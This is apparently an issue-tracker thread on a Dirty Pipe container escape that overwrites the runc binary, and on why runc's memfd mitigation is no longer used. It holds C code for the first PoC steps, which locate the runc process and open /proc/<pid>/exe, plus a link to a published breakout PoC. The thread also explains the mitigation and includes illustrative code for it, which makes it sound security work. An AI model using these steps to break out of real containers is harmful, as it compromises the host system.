-
Overwriting /proc/<runc pid>/exe through Dirty Pipe (CVE-2022-0847) can cause a container escape similar to CVE-2019-5736. However, CVE-2019-5736 was fixed with memfd_create in the commit "nsenter: clone /proc/self/exe to avoid exposing host binary to container".

So I would expect /proc/<runc pid>/exe to be an in-memory file now. When we open it, the fd we get is resolved by the kernel's proc_exe_link:

    static int proc_exe_link(struct dentry *dentry, struct path *exe_path)
    {
        struct task_struct *task;
        struct file *exe_file;

        task = get_proc_task(d_inode(dentry));
        if (!task)
            return -ENOENT;
        exe_file = get_task_exe_file(task);
        put_task_struct(task);
        if (exe_file) {
            *exe_path = exe_file->f_path;
            path_get(&exe_file->f_path);
            fput(exe_file);
            return 0;
        } else
            return -ENOENT;
    }
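
To see what that link resolves to in practice, a small user-space check can help. The sketch below is only an illustration: `inspect_proc_exe` is a hypothetical helper name, not something taken from runc or the kernel. It reads the link target with `readlink` and then opens the same link and calls `fstat` on the resulting fd, so you can see which file actually backs the executable.

```c
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper (not from runc): resolve a /proc/<pid>/exe link and
 * fstat the file that opening the link yields.
 * Returns 0 on success, -1 on error.
 */
int inspect_proc_exe(const char *link_path, char *target, size_t target_len,
                     struct stat *st)
{
    if (target_len == 0)
        return -1;

    /* readlink does not NUL-terminate, so leave room and terminate here. */
    ssize_t n = readlink(link_path, target, target_len - 1);
    if (n < 0)
        return -1;
    target[n] = '\0';

    /* Opening the link gives an fd on the file backing the executable. */
    int fd = open(link_path, O_RDONLY);
    if (fd < 0)
        return -1;

    int rc = fstat(fd, st);
    close(fd);
    return rc;
}
```

Called on `/proc/<runc pid>/exe`, a target that is an ordinary path such as the runc binary suggests the process is running from a file on disk. A target of the form `/memfd:<name> (deleted)` suggests it is running from an in-memory copy.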
But my PoC works and I don't know why. Steps:

    /* Step 1: scan /proc until a process whose cmdline mentions runc appears. */
    while (found == 0) {
        dir = opendir("/proc");
        if (dir == NULL)
            continue;
        while ((ptr = readdir(dir)) != NULL) {
            snprintf(path, sizeof(path), "/proc/%s/cmdline", ptr->d_name);
            if (isRuncProcess(path, "runc")) {
                found = atoi(ptr->d_name);
                printf("[+] Found the RUNC PID: %d\n", found);
                break;
            }
        }
        closedir(dir);
    }

    /* Step 2: keep trying to open /proc/<runc pid>/exe read-only until it succeeds. */
    int handleFd = -1;
    while (handleFd == -1) {
        snprintf(path, sizeof(path), "/proc/%d/exe", found);
        handleFd = open(path, O_RDONLY);
    }
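
The snippet above calls `isRuncProcess` without showing it. One possible shape for such a helper is sketched below. This is a guess at its behavior, not the code used in the PoC: it assumes the function should return 1 when any argument in the NUL-separated `cmdline` file contains the given string, and 0 otherwise.

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical reconstruction of the helper used above.
 * Returns 1 if any NUL-separated argument in the file at cmdline_path
 * contains needle, 0 otherwise (including when the file cannot be read).
 */
int isRuncProcess(const char *cmdline_path, const char *needle)
{
    char buf[4096];
    FILE *f = fopen(cmdline_path, "r");
    if (f == NULL)
        return 0;

    size_t n = fread(buf, 1, sizeof(buf) - 1, f);
    fclose(f);
    buf[n] = '\0'; /* guarantee termination of the last argument */

    /* Walk the arguments one by one; each ends with a NUL byte. */
    for (size_t off = 0; off < n; off += strlen(buf + off) + 1) {
        if (strstr(buf + off, needle) != NULL)
            return 1;
    }
    return 0;
}
```

A substring match like this also matches unrelated processes whose arguments merely contain "runc", so a real tool would probably want a stricter comparison on the first argument.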
-
Because of many complaints from Kubernetes folks, we switched to making /proc/self/exe a read-only bind-mount. The memfd logic still exists, but it is only exercised by rootless containers.

It's pretty frustrating that I implemented a protection against this precise issue, and we were forced to disable it because Kubernetes integration tests started failing (copying the binary increases memory usage by a few MB, and the Kubernetes tests had tiny memory limits).
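
For readers unfamiliar with the memfd approach mentioned above, here is a minimal sketch of the general idea. It is a simplified illustration and not runc's actual code; the function name `clone_exe_to_sealed_memfd` and the memfd name `exe-clone` are made up for this example. It copies an executable into an anonymous in-memory file and seals it, so that the copy lives on separate pages from the on-disk binary.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Simplified illustration (not runc's implementation): copy the file at
 * exe_path into a memfd and seal it against further modification.
 * Returns the sealed memfd on success, -1 on error.
 */
int clone_exe_to_sealed_memfd(const char *exe_path)
{
    int src = open(exe_path, O_RDONLY | O_CLOEXEC);
    if (src < 0)
        return -1;

    int mfd = memfd_create("exe-clone", MFD_CLOEXEC | MFD_ALLOW_SEALING);
    if (mfd < 0) {
        close(src);
        return -1;
    }

    char buf[65536];
    ssize_t n;
    while ((n = read(src, buf, sizeof(buf))) > 0) {
        ssize_t off = 0;
        while (off < n) { /* handle short writes */
            ssize_t w = write(mfd, buf + off, (size_t)(n - off));
            if (w < 0) {
                close(src);
                close(mfd);
                return -1;
            }
            off += w;
        }
    }
    close(src);

    /* Forbid resizing, writing, and adding or removing seals later. */
    if (n < 0 || fcntl(mfd, F_ADD_SEALS, F_SEAL_SEAL | F_SEAL_SHRINK |
                                         F_SEAL_GROW | F_SEAL_WRITE) < 0) {
        close(mfd);
        return -1;
    }
    return mfd;
}
```

A process could then re-execute itself from the returned fd (for example with `fexecve`), so that its /proc/<pid>/exe refers to the sealed copy rather than the host binary. The cost is the one described above: each clone holds a full copy of the binary in memory.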
-
Oh my god, so that is how it works. No wonder runc's actual behavior does not match the earlier fix report. Then I have a new question: runc/libcontainer/nsenter/cloned_binary.c Line 510 in 98b75be by Am I right?
-
For what it's worth, we published a container escape PoC based on overwriting the runC binary: https://github.com/DataDog/dirtypipe-container-breakout-poc

We confirmed that with a modified runC version that clones the binary instead of bind-mounting it, the PoC fails.